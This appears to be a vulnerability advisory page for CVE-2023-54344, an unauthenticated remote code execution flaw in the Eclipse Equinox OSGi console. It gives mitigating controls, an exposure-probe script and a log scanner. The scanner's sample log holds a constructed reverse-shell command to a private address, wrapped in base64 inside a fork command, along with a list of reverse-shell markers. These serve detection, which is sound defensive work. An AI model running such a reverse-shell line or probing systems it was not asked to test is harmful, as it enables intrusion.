CVE-2023-54344
Published: 05 May 2026
Summary
CVE-2023-54344 is a critical-severity Missing Authentication for Critical Function (CWE-306) vulnerability. Its CVSS base score is 9.8 (Critical).
Operationally, exploitation maps to the MITRE ATT&CK technique Exploit Public-Facing Application (T1190). The CVE ranks at the 41.7th percentile by exploit likelihood (below the median), is not currently listed in the CISA KEV catalog, and has a referenced public proof-of-concept.
The strongest mitigations our analysis identified are NIST 800-53 CM-7 (Least Functionality) and SC-7 (Boundary Protection).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): requires timely remediation of the specific flaw in Eclipse Equinox OSGi 3.7.2 and earlier, eliminating the unauthenticated remote code execution vulnerability in the console interface.
- CM-7 (Least Functionality): restricts system functionality by disabling the unnecessary OSGi console listener (do not start the framework with the -console <port> launcher argument or an osgi.console=<port> property), so the unauthenticated command-execution path is never exposed on the network.
- SC-7 (Boundary Protection): monitors and controls network communications, blocking unauthorized access to the OSGi console port where the listener cannot be removed.
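The CM-7 and SC-7 controls above both depend on knowing whether a console listener is actually reachable. The following added example (not code from the advisory, VulnCheck, Exploit-DB or the Equinox project) probes a host and port and reports whether an unauthenticated Equinox console answers. It assumes the console greets a client with the `osgi>` prompt, and it stands up constructed mock listeners on loopback so the probe can be exercised offline; the function names `probe_osgi_console`, `start_mock` and `demo` are mine.

```python
"""Check whether a host exposes an unauthenticated Equinox OSGi console.

Added example, not part of the advisory or of Eclipse Equinox. Assumptions:
the console greets a client with the 'osgi> ' prompt, and the mock listeners
below are constructed stand-ins for a real service.
"""
import socket
import socketserver
import threading

OSGI_PROMPT = b"osgi>"  # prompt string the Equinox console prints (assumption)


def probe_osgi_console(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if host:port answers like an Equinox console.

    A service that greets an unauthenticated TCP client with the osgi>
    prompt is exactly the unprotected critical function CWE-306 describes.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            sock.sendall(b"\r\n")  # nudge the console into printing a prompt
            received = b""
            while len(received) < 4096:
                try:
                    chunk = sock.recv(1024)
                except socket.timeout:
                    break
                if not chunk:
                    break
                received += chunk
                if OSGI_PROMPT in received:
                    return True
    except OSError:  # connection refused, host unreachable, reset
        return False
    return False


# --- constructed mock listeners so the probe can be exercised offline ---

class FakeEquinoxConsole(socketserver.StreamRequestHandler):
    """Mimics the legacy Equinox telnet console: a prompt, no authentication."""

    def handle(self):
        self.wfile.write(b"\r\nosgi> ")
        while self.rfile.readline():
            self.wfile.write(b"osgi> ")


class FakeOtherService(socketserver.StreamRequestHandler):
    """A non-OSGi banner service, to show the probe does not false-positive."""

    def handle(self):
        self.wfile.write(b"220 mail.example.test ESMTP ready\r\n")
        self.rfile.readline()


def start_mock(handler):
    """Start a handler on an ephemeral loopback port; return (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def free_port() -> int:
    """Reserve and release a loopback port so the closed-port probe is deterministic."""
    with socket.socket() as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> dict:
    """Probe an exposed console, a non-OSGi service and a closed port."""
    results = {}
    srv, port = start_mock(FakeEquinoxConsole)
    results["exposed_console"] = probe_osgi_console("127.0.0.1", port, timeout=1.0)
    srv.shutdown()
    srv.server_close()
    srv, port = start_mock(FakeOtherService)
    results["other_service"] = probe_osgi_console("127.0.0.1", port, timeout=1.0)
    srv.shutdown()
    srv.server_close()
    results["closed_port"] = probe_osgi_console("127.0.0.1", free_port(), timeout=1.0)
    return results


if __name__ == "__main__":
    print(demo())  # exposed_console True, other_service False, closed_port False
```

Run the probe against every host that runs an Equinox-based product, not only the ones documented as having a console; a positive result means the listener must be removed (CM-7) or, failing that, filtered at the network boundary (SC-7).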
MITRE ATT&CK Enterprise Techniques
Why these techniques? Unauthenticated remote code execution against an exposed OSGi console is exploitation of a public-facing application (T1190), and the payloads the console's fork command runs are arbitrary Unix shell commands, including reverse shells (T1059.004, Unix Shell).
NVD Description
Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.
Deeper analysis
Eclipse Equinox OSGi versions 3.7.2 and earlier contain a remote code execution vulnerability in the console interface. This flaw, tracked as CVE-2023-54344 and published on 2026-05-05, allows attackers to execute arbitrary commands by sending specially crafted payloads. It is associated with CWE-306 (Missing Authentication for Critical Function) and carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), indicating critical severity due to its network accessibility and lack of prerequisites.
Unauthenticated attackers exploit this vulnerability by connecting to the exposed OSGi console port and transmitting base64-encoded bash commands wrapped in the console's fork command, which runs its argument as a separate operating-system process. Successful exploitation yields arbitrary code execution on the target system, including the establishment of reverse shell connections for persistent access and further compromise.
Advisories and related resources, including a VulnCheck advisory on the Eclipse Equinox OSGi remote code execution and an Exploit-DB entry (exploit 51879), provide details on the issue, with the latter publishing a proof-of-concept exploit. No specific patch or mitigation details are outlined in the core CVE information.
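For detection, the exploitation pattern described above (a fork or exec console command whose argument pipes a base64 blob through base64 -d into a shell) is narrow enough to match directly. The following added example, not code from the advisory or the proof-of-concept, decodes the wrapped payload and flags reverse-shell indicators in it; the session log lines are constructed, and the function names `analyze_console_command` and `scan_console_log` are mine.

```python
"""Flag Equinox console commands that match the CVE-2023-54344 exploit pattern.

Added example, not from the advisory or the PoC. The log lines are constructed;
'fork' and 'exec' are the Equinox console commands that spawn a process.
"""
import base64
import binascii
import re

# optional 'osgi> ' prompt, then a process-spawning console verb and its arguments
SPAWN_RE = re.compile(r"^\s*(?:osgi>\s*)?(fork|exec)\s+(.*)$")
# echo <base64> | base64 -d  (the wrapping the advisory describes)
B64_PIPE_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
)
REVERSE_SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc ", "ncat ", "socat ", "mkfifo")


def analyze_console_command(line: str):
    """Return a finding dict for a process-spawning console command, else None."""
    m = SPAWN_RE.match(line)
    if not m:
        return None  # ss, install, start ... are framework commands, not OS commands
    verb, args = m.groups()
    finding = {"verb": verb, "severity": "medium", "decoded": None, "indicators": []}
    b = B64_PIPE_RE.search(args)
    if b:
        finding["severity"] = "high"
        finding["indicators"].append("base64-wrapped shell command")
        try:
            decoded = base64.b64decode(b.group(1), validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = None  # malformed blob: still high, but nothing to inspect
        finding["decoded"] = decoded
        if decoded:
            for marker in REVERSE_SHELL_MARKERS:
                if marker in decoded:
                    finding["indicators"].append(f"reverse-shell marker: {marker}")
    return finding


def scan_console_log(lines):
    """Run the analyzer over a console session log; keep only the findings."""
    return [f for f in (analyze_console_command(line) for line in lines) if f]


# Constructed session log. The payload is encoded here so the sample is exact.
_PAYLOAD = base64.b64encode(b"bash -i >& /dev/tcp/10.0.0.5/4444 0>&1").decode()
SAMPLE_LOG = [
    "osgi> ss",
    f'osgi> fork /bin/bash -c "echo {_PAYLOAD} | base64 -d | bash"',
    "osgi> exec id",
]


if __name__ == "__main__":
    for finding in scan_console_log(SAMPLE_LOG):
        print(finding)  # one high finding (fork, reverse shell) and one medium (exec id)
```

Any fork or exec arriving over the console port is worth an alert on its own; in a hardened deployment the listener should not exist, so even the medium finding indicates the CM-7 control has failed.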
Details
- CWE(s)